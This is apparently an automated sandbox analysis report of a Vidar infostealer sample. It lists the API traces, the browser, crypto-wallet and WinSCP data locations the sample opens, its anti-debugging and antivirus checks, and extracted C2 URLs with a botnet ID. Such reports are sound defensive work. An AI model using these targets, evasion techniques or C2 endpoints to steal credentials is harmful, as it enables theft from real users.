Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00411B90 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00411B90
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0040BC20 wsprintfA,FindFirstFileA,_memset,lstrcat,StrCmpCA,StrCmpCA,lstrcpy,lstrcat,lstrcat,_strlen,_memset,_memset,StrCmpCA,wsprintfA,wsprintfA,lstrlen,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,CoInitialize,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,	0_2_0040BC20
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00411DD0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,StrCmpCA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,_memset,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00411DD0
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0041AFF0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,wsprintfA,_memset,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,_memset,_memset,FindNextFileA,FindClose,	0_2_0041AFF0
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0040B190 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,_memset,lstrcat,lstrlen,_memset,	0_2_0040B190
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_004162F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_004162F0
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00416770 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,StrCmpCA,StrCmpCA,DeleteFileA,FindNextFileA,FindClose,	0_2_00416770
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00409F60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00409F60

Source: C:\Users\user\Desktop\06625899.exe

0_2_0040D1C0

Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Source: 06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\06625899.exe

Code function: 0_2_0042A36A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_0042A36A

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\06625899.exe

0_2_00424430

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\06625899.exe

Code function: 0_2_0041F170 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,

0_2_0041F170

Source: C:\Users\user\Desktop\06625899.exe

Memory protected: page guard

Jump to behavior

Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0042A36A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0042A36A
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0043139E _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0043139E
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00435F17 SetUnhandledExceptionFilter,	0_2_00435F17

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\06625899.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\06625899.exe	Code function: GetProcessHeap,HeapAlloc,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,_memset,LocalFree,	0_2_0041EE70
Source: C:\Users\user\Desktop\06625899.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	0_2_00438131
Source: C:\Users\user\Desktop\06625899.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_004381F1
Source: C:\Users\user\Desktop\06625899.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_00438258
Source: C:\Users\user\Desktop\06625899.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	0_2_00438294
Source: C:\Users\user\Desktop\06625899.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_00437597
Source: C:\Users\user\Desktop\06625899.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	0_2_004366D3
Source: C:\Users\user\Desktop\06625899.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	0_2_0042E77A
Source: C:\Users\user\Desktop\06625899.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_00437885
Source: C:\Users\user\Desktop\06625899.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	0_2_0043693B
Source: C:\Users\user\Desktop\06625899.exe	Code function: GetLocaleInfoA,	0_2_00430A1A
Source: C:\Users\user\Desktop\06625899.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	0_2_0043AB62
Source: C:\Users\user\Desktop\06625899.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_0043AC3C
Source: C:\Users\user\Desktop\06625899.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00437D69
Source: C:\Users\user\Desktop\06625899.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	0_2_00437E5E
Source: C:\Users\user\Desktop\06625899.exe	Code function: GetLocaleInfoA,wsprintfA,_memset,LocalFree,	0_2_0041EED8
Source: C:\Users\user\Desktop\06625899.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	0_2_00437F60
Source: C:\Users\user\Desktop\06625899.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	0_2_00437F05

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\06625899.exe

Code function: 0_2_00401090 cpuid

0_2_00401090

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\Desktop\06625899.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\06625899.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\06625899.exe

Code function: 0_2_00420120 GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,

0_2_00420120

Source: C:\Users\user\Desktop\06625899.exe

Code function: 0_2_00420120 GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,

0_2_00420120

Source: C:\Users\user\Desktop\06625899.exe

Code function: 0_2_0041EDD0 GetUserNameA,

0_2_0041EDD0

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\Desktop\06625899.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

AV process strings found (often used to terminate AV products)

Source: 06625899.exe, 00000000.00000002.413121737.00000000031BF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Windows Defender\MsMpeng.exe
Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.06625899.exe.2320e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.06625899.exe.2320e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.06625899.exe.2380000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.06625899.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.06625899.exe.2380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.06625899.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 06625899.exe PID: 7120, type: MEMORYSTR

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\?	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\?	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\?	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\?	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\?	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\?	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\06625899.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 06625899.exe	String found in binary or memory: \Electrum\wallets\
Source: 06625899.exe, 00000000.00000002.413121737.0000000003160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets\?*U/
Source: 06625899.exe	String found in binary or memory: \Electrum\wallets\
Source: 06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: exodus.conf.json
Source: 06625899.exe	String found in binary or memory: \Exodus\backups
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: info.seco
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ElectrumLTC
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: passphrase.json
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \jaxx\Local Storage\
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\
Source: 06625899.exe	String found in binary or memory: Exodus Web3 Wallet
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Ethereum"
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: default_wallet
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: file__0.localstorage
Source: 06625899.exe, 00000000.00000002.413121737.0000000003160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\MultiDoge\?}
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: seed.seco
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Electrum-LTC\wallets\

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 06625899.exe PID: 7120, type: MEMORYSTR

Remote Access Functionality

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.06625899.exe.2320e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.06625899.exe.2320e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.06625899.exe.2380000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.06625899.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.06625899.exe.2380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.06625899.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 06625899.exe PID: 7120, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.34.154.187	unknown	Germany	24940	HETZNER-ASDE	false
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false
23.88.46.113	unknown	United States	18978	ENZUINC-US	false

Contacted Domains

Name	IP	Active
t.me	149.154.167.99	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://t.me/looking_glassbot	false		high
http://188.34.154.187:30303/667e85c8112da056f901292caf82b3ed	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199508624021	false		high
http://188.34.154.187:30303/addon.zip	false	Avira URL Cloud: safe	unknown
http://188.34.154.187:30303/	false	Avira URL Cloud: safe	unknown

AV Detection

Found malware configuration

Source: 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199508624021", "https://t.me/looking_glassbot"], "Botnet": "667e85c8112da056f901292caf82b3ed"}

Machine Learning detection for sample

Source: 06625899.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00415040 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00415040
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00409EC0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,_memset,CryptBinaryToStringA,	0_2_00409EC0
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00415180 _malloc,_malloc,CryptUnprotectData,	0_2_00415180
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00401430 _memset,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,	0_2_00401430
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00414D80 _memset,lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,	0_2_00414D80
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00414FC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00414FC0

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\06625899.exe

Unpacked PE file: 0.2.06625899.exe.400000.0.unpack

Uses 32bit PE files

Source: 06625899.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\06625899.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49684 version: TLS 1.2

Source:	Binary string: C:\yukigusorefu\murebobunuxac\tuju payuxax-nus\w.pdb source: 06625899.exe
Source:	Binary string: uDC:\yukigusorefu\murebobunuxac\tuju payuxax-nus\w.pdb source: 06625899.exe

Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00424100 FindFirstFileW,_wcslen,FindNextFileW,_wcslen,FindNextFileW,	0_2_00424100
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00416500 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00416500
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_004118B0 _memset,lstrcat,wsprintfA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_004118B0
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00416B10 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,_memset,_memset,_memset,_memset,_memset,_memset,FindNextFileA,FindClose,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,_memset,_memset,_memset,_memset,_memset,_memset,	0_2_00416B10
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00411B90 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00411B90
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0040BC20 wsprintfA,FindFirstFileA,_memset,lstrcat,StrCmpCA,StrCmpCA,lstrcpy,lstrcat,lstrcat,_strlen,_memset,_memset,StrCmpCA,wsprintfA,wsprintfA,lstrlen,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,CoInitialize,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,	0_2_0040BC20
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00411DD0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,StrCmpCA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,_memset,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00411DD0
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0041AFF0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,wsprintfA,_memset,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,_memset,_memset,FindNextFileA,FindClose,	0_2_0041AFF0
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0040B190 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,_memset,lstrcat,lstrlen,_memset,	0_2_0040B190
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_004162F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_004162F0
